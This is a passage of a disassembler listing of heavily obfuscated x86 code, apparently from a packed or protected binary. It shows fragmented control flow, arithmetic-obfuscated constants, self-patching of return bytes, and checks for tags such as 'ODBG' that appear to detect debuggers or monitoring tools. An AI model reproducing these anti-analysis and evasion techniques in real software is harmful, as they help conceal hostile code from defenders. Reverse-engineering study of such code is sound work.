		lea	eax, [ebp-125h]
		push	eax
		call	sub_43A87E
		call	sub_44A87E

locret_44313E:				; CODE XREF: sub_43FD5B:loc_43FD69j
		retn
; END OF FUNCTION CHUNK	FOR sub_4422A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44980B

loc_44313F:				; CODE XREF: sub_44980B:loc_43B3AFj
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44A0A1
		jmp	loc_453244
; END OF FUNCTION CHUNK	FOR sub_44980B
; ---------------------------------------------------------------------------
		ror	ebx, 1
		jmp	sub_457C08
; ---------------------------------------------------------------------------

loc_443155:				; DATA XREF: sub_448B99-DD7Fo
		mov	eax, [ebp-4]
		call	nullsub_4
		pop	ecx
		pop	ecx
		pop	ebp
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_545. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_443163	proc near		; CODE XREF: sub_44191F:loc_439BDAp
					; hvvrg7ie:004524D8j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043EC15 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044AA81 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_44CEC8
		mov	eax, 0C7CC2482h
		jmp	loc_44AA81
sub_443163	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_400. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D140

loc_44317B:				; CODE XREF: sub_43D140+15D69j
		jmp	loc_457D5B
; END OF FUNCTION CHUNK	FOR sub_43D140
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_443180:				; CODE XREF: sub_445CCD-C1B4j
		jmp	nullsub_332
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_443185:				; CODE XREF: sub_45541B:loc_44305Bj
		push	4B1C86h
		mov	eax, [ebp+var_10]
		push	eax
		call	sub_43FA98
		jmp	loc_4442DB
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------

loc_443198:				; CODE XREF: hvvrg7ie:loc_4565F4j
					; hvvrg7ie:0045660Bj
		rol	ebx, 1Fh
		add	ebx, 0E7A905Fh
		push	offset loc_44E1E4
		jmp	loc_45A13E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4431AB:				; CODE XREF: sub_43F227:loc_442A24j
		jnz	loc_450BAA
		jmp	loc_4496A5
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405D7

loc_4431B6:				; CODE XREF: sub_4405D7+AB38j
		ja	loc_442DF1

loc_4431BC:				; CODE XREF: sub_4405D7:loc_445703j
		push	0BFA92584h
		pop	eax
		rol	eax, 5
		add	eax, 768ED5AFh
		and	eax, 0DD2C5E41h
		add	eax, 0D3616D06h
		call	sub_448C76

loc_4431DC:				; CODE XREF: hvvrg7ie:0043D9A0j
					; hvvrg7ie:0044F2BBj
		xchg	eax, [esp-4+arg_0]
		call	sub_4531B1
		xor	edi, ecx
		cdq
		jmp	sub_453934
; END OF FUNCTION CHUNK	FOR sub_4405D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442BA8

loc_4431EC:				; CODE XREF: sub_442BA8:loc_43D0D6j
		xchg	edx, [esp-4+arg_0]
		jmp	sub_44E560
; END OF FUNCTION CHUNK	FOR sub_442BA8
; ---------------------------------------------------------------------------

loc_4431F4:				; CODE XREF: hvvrg7ie:0044DA7Ej
		test	esi, 8000000h
		jmp	loc_4441CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4431FF:				; CODE XREF: sub_44D2F8+16F9j
		jnp	loc_444DED

loc_443205:				; CODE XREF: sub_44D2F8:loc_451749j
		lea	eax, [ebp-25Ch]
		cmp	dword ptr [eax], 4742444Fh

loc_443211:				; CODE XREF: hvvrg7ie:loc_448492j
		jz	loc_43BCB4
		jmp	loc_458726
; END OF FUNCTION CHUNK	FOR sub_44D2F8

; =============== S U B	R O U T	I N E =======================================



sub_44321C	proc near		; DATA XREF: sub_446D8D+4D5Bo

; FUNCTION CHUNK AT 004561D8 SIZE 00000005 BYTES

		pop	esi
		lea	eax, nullsub_442
		push	offset loc_450555
		jmp	loc_4561D8
sub_44321C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429CE

loc_44322D:				; CODE XREF: sub_4429CE+18041j
		pop	ecx
; END OF FUNCTION CHUNK	FOR sub_4429CE
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_44322E:				; CODE XREF: sub_45AAC8:loc_445989j
					; sub_45AAC8-11B85j
		sub	eax, 509C5685h
		ror	eax, 6
		push	edi
		push	6C334D27h
		jmp	loc_43FFEC
; END OF FUNCTION CHUNK	FOR sub_45AAC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_443242:				; CODE XREF: sub_445934+9DDCj
		jnz	loc_443707
		jmp	loc_44FD05
; END OF FUNCTION CHUNK	FOR sub_445934
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_44324D:				; CODE XREF: sub_44E3B3+66CDj
		xor	eax, 341DBB7Fh
		add	eax, ebp
		add	eax, 0EB66E95Dh
		mov	eax, [eax]
		test	byte ptr [eax+1], 80h
		jmp	loc_443EBC
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_443266:				; CODE XREF: sub_43C0DE+6D9Bj
					; sub_43C811:loc_44C866j ...
		push	offset sub_445E62
		jmp	nullsub_179
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439A6C

loc_443270:				; CODE XREF: sub_439A6C:loc_457C7Dj
		xchg	ecx, [esp+0]
		ror	eax, 9
		mov	ds:dword_43CDC4, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_439A6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_44327D:				; CODE XREF: sub_4527A1-C456j
		call	sub_446ED4
; END OF FUNCTION CHUNK	FOR sub_4527A1
; START	OF FUNCTION CHUNK FOR sub_445616

loc_443282:				; CODE XREF: sub_445616+9j
		jmp	sub_451B35
; END OF FUNCTION CHUNK	FOR sub_445616
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_443287:				; CODE XREF: sub_456F9F:loc_455081j
		jge	loc_43C710

loc_44328D:				; CODE XREF: hvvrg7ie:004502D0j
		jmp	loc_43B768
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_443292:				; CODE XREF: sub_43D285+8068j
		jmp	loc_4392F5
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_443297:				; CODE XREF: sub_445CCD-A74Fj
		jmp	loc_44BBF5
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
		rol	ecx, 4
		jmp	loc_43C70D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BF66

loc_4432A4:				; CODE XREF: sub_44BF66+8j
		xchg	ebp, [esp+4+var_4]
		push	0
		call	sub_446297

loc_4432AE:				; CODE XREF: sub_449425:loc_4455AFj
		push	0DB3C7D63h
		pop	edx
		rol	edx, 1Ch
		sub	edx, 0F9A02724h
		and	edx, 0F4D65D57h
		jmp	loc_4408A9
; END OF FUNCTION CHUNK	FOR sub_44BF66
; ---------------------------------------------------------------------------

loc_4432C8:				; CODE XREF: hvvrg7ie:loc_44B690j
		jnz	loc_4479B4
; START	OF FUNCTION CHUNK FOR sub_43A0EC

loc_4432CE:				; CODE XREF: sub_43A0EC+168DEj
		jmp	loc_43EA2F
; END OF FUNCTION CHUNK	FOR sub_43A0EC
; ---------------------------------------------------------------------------
		jns	loc_44C6DA
		adc	edi, 6496E82Ch
		shl	eax, 9
		ror	ebx, 0Bh
		jmp	loc_4487B0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_358. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F6B

loc_4432EB:				; CODE XREF: sub_442F6B+58A2j
					; hvvrg7ie:loc_44B770j
		jmp	loc_44FA9E
; END OF FUNCTION CHUNK	FOR sub_442F6B
; ---------------------------------------------------------------------------

loc_4432F0:				; DATA XREF: sub_44E533-4EFCo
		mov	ds:dword_41D14C, eax
		lea	eax, nullsub_494
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A306
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		jmp	loc_44F9E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_44330D:				; CODE XREF: sub_43CD0B+1176Fj
		sub	al, 99h
		mov	edx, [ebp-4]

loc_443312:				; CODE XREF: hvvrg7ie:loc_43C7B9j
		push	offset loc_4573D2
		jmp	loc_4477BD
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458374

loc_44331C:				; CODE XREF: sub_458374:loc_453D8Aj
		sbb	edx, 751E220Fh
		jns	loc_44A709
		jbe	loc_45777F
		pop	edi
		jmp	loc_43CABB
; END OF FUNCTION CHUNK	FOR sub_458374
; ---------------------------------------------------------------------------
		jnz	sub_444632
		jmp	loc_4435F4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_145. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_443340:				; CODE XREF: hvvrg7ie:0044C603j
		jmp	loc_450DBD

; =============== S U B	R O U T	I N E =======================================



sub_443345	proc near		; CODE XREF: sub_454703:loc_43F9F4p
					; hvvrg7ie:00449DADj
		xchg	edx, [esp+0]
		pop	edx
		mov	ds:dword_45388C, eax
		push	offset loc_450302
		jmp	nullsub_43
sub_443345	endp


; =============== S U B	R O U T	I N E =======================================



sub_443358	proc near		; DATA XREF: sub_44616F-506Do

; FUNCTION CHUNK AT 0045781E SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		jmp	loc_45781E
sub_443358	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452AA0

loc_443360:				; CODE XREF: sub_452AA0:loc_45765Ej
		shl	ebp, 0Fh
		not	ebx
		jmp	loc_43A8D9
; END OF FUNCTION CHUNK	FOR sub_452AA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_44336A:				; CODE XREF: sub_4500FA:loc_444494j
		jnz	loc_4470F8
		jmp	loc_4445A4
; END OF FUNCTION CHUNK	FOR sub_4500FA

; =============== S U B	R O U T	I N E =======================================



sub_443375	proc near		; DATA XREF: sub_43E128+EF32o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00439493 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439923 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043A218 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043D639 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004441A8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00446D12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004485FD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00448CC5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B3BF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BDB8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450346 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00451267 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004552C5 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004577F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004592A5 SIZE 0000000E BYTES

		cmp	dword ptr [ebp-10Ch], 6D676552h
		jnz	loc_44DCB3
		jmp	loc_43D639
sub_443375	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_44338A:				; CODE XREF: sub_45541B:loc_44DAD0j
		pop	eax
		xor	eax, 91D323D3h
		rol	eax, 0Ah
		and	eax, 0D0D2FC9Bh
		xor	eax, 80405412h
		jmp	loc_449157
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439953

loc_4433A5:				; CODE XREF: sub_439953:loc_44402Fj
		mov	eax, [eax]
		mov	ecx, 3FBh
		xor	edx, edx
		div	ecx
		push	ebx
		push	offset sub_441DAA
		jmp	loc_441E94
; END OF FUNCTION CHUNK	FOR sub_439953
; ---------------------------------------------------------------------------

loc_4433BB:				; DATA XREF: sub_448057-4FF5o
		mov	[ebp-8], eax
		jmp	loc_444F2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8A5

loc_4433C3:				; CODE XREF: sub_43B8A5+1643Aj
		test	byte ptr [ebp-8], 8
		jz	loc_453E30
		push	ebp
		mov	eax, [ebp-20h]
		call	sub_443D2B
		pop	ecx
		mov	[ebp-20h], eax
		jmp	loc_43B821
; END OF FUNCTION CHUNK	FOR sub_43B8A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441B2C

loc_4433DF:				; CODE XREF: sub_441B2C:loc_45A827j
		pushf
		push	653E11DEh
		pop	edx
		and	edx, 9B6AE7D9h
		or	edx, 0F8A0A800h
		add	edx, 6993DBFh
		popf

loc_4433F9:				; CODE XREF: hvvrg7ie:loc_4594D0j
		jmp	loc_43913C
; END OF FUNCTION CHUNK	FOR sub_441B2C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_198. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_4433FF:				; CODE XREF: sub_45889B-E594j
		jmp	loc_45ACA0
; END OF FUNCTION CHUNK	FOR sub_45889B

; =============== S U B	R O U T	I N E =======================================



sub_443404	proc near		; DATA XREF: hvvrg7ie:0045A01Ao
		push	491C8956h
		pop	edx
		or	edx, 7188D091h
		and	edx, 6C758936h
		sub	edx, 4755BD96h
		add	edx, 0DF8568AAh
		xchg	edx, [esp+0]
		jmp	sub_458D36
sub_443404	endp

; ---------------------------------------------------------------------------
		mov	eax, 72B18749h
		jmp	loc_43A4F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_443434:				; CODE XREF: sub_45038B:loc_45A1BFj
		jnz	loc_44A8C9
; END OF FUNCTION CHUNK	FOR sub_45038B
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_44343A:				; CODE XREF: sub_43B6A5+1414Dj
		jmp	loc_44FD56
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
		xor	edx, edi
		jl	loc_441BE6
		jmp	loc_43D8D4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_128. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_44344D:				; CODE XREF: sub_444B29+Dj
		jmp	loc_43DD72
; END OF FUNCTION CHUNK	FOR sub_444B29

; =============== S U B	R O U T	I N E =======================================



sub_443452	proc near		; CODE XREF: hvvrg7ie:0044954Aj
					; sub_44CF35+2p
					; DATA XREF: ...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00439200 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00439858 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043A265 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00445FB8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447838 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044972F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D908 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044DB39 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044E88C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450904 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450E8B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004516EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004519C1 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00451E42 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00453323 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456B85 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045A8D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AA22 SIZE 00000016 BYTES

		xchg	eax, [esp+0]
		pop	eax
		cmp	al, 0A4h
		jz	loc_44972F
		jmp	loc_445FB8
sub_443452	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F13A

loc_443463:				; CODE XREF: sub_43F13A+102D9j
		mov	ebp, [edi]

loc_443465:				; CODE XREF: sub_43F13A:loc_43F354j
		push	offset sub_44271E
		jmp	loc_43F3EF
; END OF FUNCTION CHUNK	FOR sub_43F13A

; =============== S U B	R O U T	I N E =======================================



sub_44346F	proc near		; CODE XREF: hvvrg7ie:00450844j
					; sub_44B69F+CD7Ap

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043A36F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BC12 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E14E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00446A4C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044A09B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044D2E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454C6E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00455630 SIZE 0000001E BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, ebp
		add	eax, 3F99E1C0h
		jmp	loc_454C6E
sub_44346F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_443480:				; CODE XREF: hvvrg7ie:0043C19Aj
		rol	eax, 17h
		push	offset sub_451DAF
		jmp	locret_458AF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_44348D:				; CODE XREF: sub_440AD9:loc_4438C5j
		push	943BDA39h
		pop	eax
		add	eax, 6618E336h
		rol	eax, 1Eh
		test	eax, 20000h
		jmp	loc_456A01
; END OF FUNCTION CHUNK	FOR sub_440AD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B29

loc_4434A7:				; CODE XREF: sub_439B29+16535j
		jnp	loc_44FDDF
		rol	ebx, 4
		jmp	loc_43CEE5
; END OF FUNCTION CHUNK	FOR sub_439B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8C7

loc_4434B5:				; CODE XREF: sub_44C8C7:loc_44E98Cj
		pop	edi
		cmp	edx, 0F0AB36Bh
		jb	loc_4393B2
		push	offset loc_44E770
		jmp	loc_449F8D
; END OF FUNCTION CHUNK	FOR sub_44C8C7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_4434CC:				; CODE XREF: sub_45061E-F293j
		shl	ecx, 11h
		rol	esi, 0Eh
		jmp	loc_45566A
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44646D

loc_4434D7:				; CODE XREF: sub_44646Dj
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_45566A
		jmp	loc_456B7B
; END OF FUNCTION CHUNK	FOR sub_44646D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45471C

loc_4434EB:				; CODE XREF: sub_45471C:loc_43CD74j
		xchg	edx, [esp+4+var_4]
		jmp	loc_454BEA
; END OF FUNCTION CHUNK	FOR sub_45471C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_4434F3:				; CODE XREF: sub_450F97-D095j
		add	eax, edx
		pop	edx
		mov	eax, [eax]
		push	eax
		call	sub_44C072

loc_4434FE:				; CODE XREF: sub_43AE41+7j
					; sub_450F97-1484Fj ...
		jz	loc_44FDD0
		push	0DA150E1Ah
		jmp	loc_44C6FC
; END OF FUNCTION CHUNK	FOR sub_450F97

; =============== S U B	R O U T	I N E =======================================



sub_44350E	proc near		; CODE XREF: hvvrg7ie:00445363j
					; hvvrg7ie:0045623Cp
		xchg	esi, [esp+0]
		pop	esi
		mov	[esi], eax
		pop	esi
		push	offset loc_4493FD
		jmp	nullsub_513
sub_44350E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	ecx, 329E8A05h
		jmp	loc_458FF1

; =============== S U B	R O U T	I N E =======================================



sub_44352A	proc near		; CODE XREF: hvvrg7ie:0044A637j
					; sub_457C82p

; FUNCTION CHUNK AT 0044EB06 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045B1FA SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		jns	sub_456209
		push	edx
		jmp	loc_45B1FA
sub_44352A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44353A:				; CODE XREF: hvvrg7ie:00444446j
		jbe	loc_44CE40
		popf
		jmp	loc_4491DC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_108. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F0E

loc_443547:				; CODE XREF: sub_452F0E-3BFj
		jmp	loc_43E1D5
; END OF FUNCTION CHUNK	FOR sub_452F0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_44354C:				; CODE XREF: sub_448BC0-341Fj
		jmp	loc_43FA68
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44973C

loc_443551:				; CODE XREF: sub_44973C:loc_44A837j
		xchg	ebp, [esp+8+var_8]
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		push	offset loc_45B75B
		jmp	nullsub_83
; END OF FUNCTION CHUNK	FOR sub_44973C

; =============== S U B	R O U T	I N E =======================================



sub_443564	proc near		; CODE XREF: sub_457774:loc_442C16j

var_4		= dword	ptr -4

		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+4+var_4]
		push	offset loc_455138
		jmp	nullsub_300
sub_443564	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_443574:				; CODE XREF: sub_446D8D:loc_4427ADj
		jnz	loc_4548EC
		jmp	loc_43E1A3
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
		test	edi, ecx
		jmp	loc_4594D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_443586:				; CODE XREF: sub_43D531+55A5j
		jnz	loc_449BB1
; END OF FUNCTION CHUNK	FOR sub_43D531
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_44358C:				; CODE XREF: sub_44191F-883Ej
		jmp	loc_4569A3
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
		jnz	loc_458280
		jmp	loc_455CF3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_188. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44359D	proc near		; DATA XREF: sub_43EE33+8079o

; FUNCTION CHUNK AT 00447417 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004546E4 SIZE 00000005 BYTES

		test	al, al
		jnz	loc_445888
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0E8h
		jnz	loc_43E138
		mov	eax, [ebp-4]
		inc	eax
		jmp	loc_4546E4
sub_44359D	endp

; ---------------------------------------------------------------------------

loc_4435BA:				; CODE XREF: hvvrg7ie:0044CB3Cj
		pop	ebx
		or	ebx, 4C6B24CBh
		sub	ebx, 0CF11BEAEh
		or	ebx, 2560702h
		add	ebx, 4D422165h
		mov	[ebx], eax
		xchg	eax, [esp]
		jmp	loc_43EEB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_4435DD:				; CODE XREF: sub_43EBB6:loc_43AC5Cj
		add	esp, 8
		movzx	eax, word ptr [eax]
		shl	eax, 2
		mov	edx, [ebp-14h]
		mov	edx, [edx+1Ch]
		add	edx, [ebp-4]
		jmp	loc_43AD18
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; ---------------------------------------------------------------------------

loc_4435F4:				; CODE XREF: hvvrg7ie:0044333Aj
		sub	ebp, 7D3290A2h

; =============== S U B	R O U T	I N E =======================================



sub_4435FA	proc near		; CODE XREF: sub_443452+A6E8p

; FUNCTION CHUNK AT 0044972E SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00449734 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0044A85B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E449 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004504D5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459D16 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A3F8 SIZE 00000009 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_449734
		jmp	loc_44E449
sub_4435FA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B4C

loc_44360E:				; CODE XREF: sub_446B4C+1Aj
		call	sub_449466

loc_443613:				; CODE XREF: hvvrg7ie:0044B27Aj
		jmp	nullsub_3
; END OF FUNCTION CHUNK	FOR sub_446B4C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE9B

loc_443618:				; CODE XREF: sub_43FE9B:loc_439CB4j
		xchg	ebx, [esp+4+var_4]
		mov	ecx, [esp+4+arg_8]
		mov	dword ptr [ecx], 10001h
		lea	eax, sub_43B914
		jmp	loc_43B900
; END OF FUNCTION CHUNK	FOR sub_43FE9B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_366. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439873

loc_443631:				; CODE XREF: sub_439873+4FFCj
		jmp	loc_441F49
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_443636:				; CODE XREF: sub_4554E8-19E67j
		jmp	loc_43D86B
; END OF FUNCTION CHUNK	FOR sub_4554E8

; =============== S U B	R O U T	I N E =======================================



sub_44363B	proc near		; CODE XREF: sub_43F98C+Fp
					; hvvrg7ie:0044A7FEj

; FUNCTION CHUNK AT 00452BEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453F75 SIZE 00000011 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	edx
		call	sub_449EB1
		push	0F280297Eh
		jmp	loc_452BEB
sub_44363B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEC3

loc_44364F:				; CODE XREF: sub_43DEC3:loc_45AF92j
		xchg	ebx, [esp+4+var_4]
		call	sub_44973C
		mov	eax, 0D59435E2h
		push	esi
		push	0FFECFAEDh
		pop	esi
		sub	esi, 690579D1h
		jmp	loc_43A303
; END OF FUNCTION CHUNK	FOR sub_43DEC3
; ---------------------------------------------------------------------------

loc_44366E:				; CODE XREF: hvvrg7ie:loc_44E708j
		popf
		add	edx, 954468C5h
		jmp	loc_45093C
; ---------------------------------------------------------------------------
		mov	ecx, eax
		jmp	loc_45892F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_443681:				; CODE XREF: sub_44370F:loc_44ACC6j
		push	esi
		push	0DF4AE362h
		pop	esi
		rol	esi, 1
		cmp	esi, 1991A190h
		jmp	loc_442974
; END OF FUNCTION CHUNK	FOR sub_44370F

; =============== S U B	R O U T	I N E =======================================



sub_443695	proc near		; DATA XREF: sub_43D4D2-339Ao

; FUNCTION CHUNK AT 0045287E SIZE 00000005 BYTES

		pop	ecx
		lea	eax, loc_43C271
		mov	byte ptr [eax],	0C3h
		jmp	loc_45287E
sub_443695	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405AA

loc_4436A4:				; CODE XREF: sub_4405AA:loc_4405AFj
		push	offset loc_43B952
		jmp	nullsub_44
; END OF FUNCTION CHUNK	FOR sub_4405AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_4436AE:				; CODE XREF: sub_45488E-1292Dj
		push	edx
		mov	edx, eax
		xchg	edx, [esp+4+var_4]
		retn
; END OF FUNCTION CHUNK	FOR sub_45488E
; ---------------------------------------------------------------------------

loc_4436B5:				; CODE XREF: hvvrg7ie:004411B0j
		jmp	loc_4538FE
